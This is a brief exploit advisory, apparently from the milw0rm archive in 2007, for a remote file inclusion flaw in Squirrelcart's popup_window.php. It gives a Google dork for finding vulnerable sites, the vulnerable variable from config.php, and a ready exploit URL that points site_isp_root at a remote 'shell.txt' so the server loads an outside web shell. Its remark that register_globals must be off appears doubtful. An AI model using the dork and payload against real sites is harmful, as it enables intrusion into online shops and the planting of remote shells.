Title : Squirrelcart <= 1.x.x Remote File Inclusion URL : http://squirrelcart.com/ Google Dork : inurl:"/squirrelcart/" -squirrelcart.com Author : ShaiMagal Vulnerable file : popup_window.php ->* config.php*, line 13 - $site_isp_root = "blablabla"; Exploit : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt? notes : register_globals = off is needed it seems. # milw0rm.com [2007-08-19]